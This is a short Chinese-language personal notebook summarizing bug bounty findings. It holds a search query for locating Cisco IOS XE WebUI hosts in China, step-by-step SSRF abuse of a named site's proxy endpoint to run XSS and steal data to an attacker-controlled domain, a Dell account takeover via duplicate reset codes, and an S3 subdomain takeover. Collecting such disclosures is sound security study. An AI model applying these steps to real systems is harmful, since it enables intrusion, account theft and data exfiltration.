随手记

一、Cisco IOS XE 系统 WebUI 未授权命令执行漏洞分析

body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>" && country="CN"

二、导致服务器瘫痪的 SSRF

  1. 访问以下 URL:https://data.jij0.me/proxy?url=https://example.com
  2. 该网站应在 data.jij0.me 的上下文中呈现 example.com 域。
  3. 要通过反射型 XSS 来利用该漏洞,请在您控制的域上托管 XSS HTML 文件。
  4. 通过访问以下 URL 使用“代理”端点:https://data.jij0.me/proxy ?url=https://your-control-domain.com/xss-file.html
  5. 这应该在 data.jij0.me 的上下文中执行 XSS 攻击。
  6. 要通过 CORS 窃取来利用此漏洞,请在您控制的域上托管 CORS 窃取 HTML 文件。
  7. 通过访问以下 URL 使用“代理”端点:https://data.jij0.me/proxy ?url=https://your-control-domain.com/cors-stealing-file.html
  8. 这应该从 data.jij0.me 网站窃取数据并将其发送到您的受控域。
  9. 它还可能导致 Hit GenericJDBCException,从而导致 JDBC 锁定并可能导致服务器停机。

二、Easy Account Takeover on dell subdomain

一个受害者一个攻击者,服务商发送两个验证码一样的(猜测是按照时间段发送的),这样我们以受害者的方式重置密码。

三、Recon 只需 5 分钟即可获得 500 美元赏金!!!!

我随机想到在没有任何路径的情况下访问子域,你猜怎么着,子域抛出了经典错误“No Such Bucket”。我立即登录 aws 控制台并创建存储桶,并且能够执行子域接管。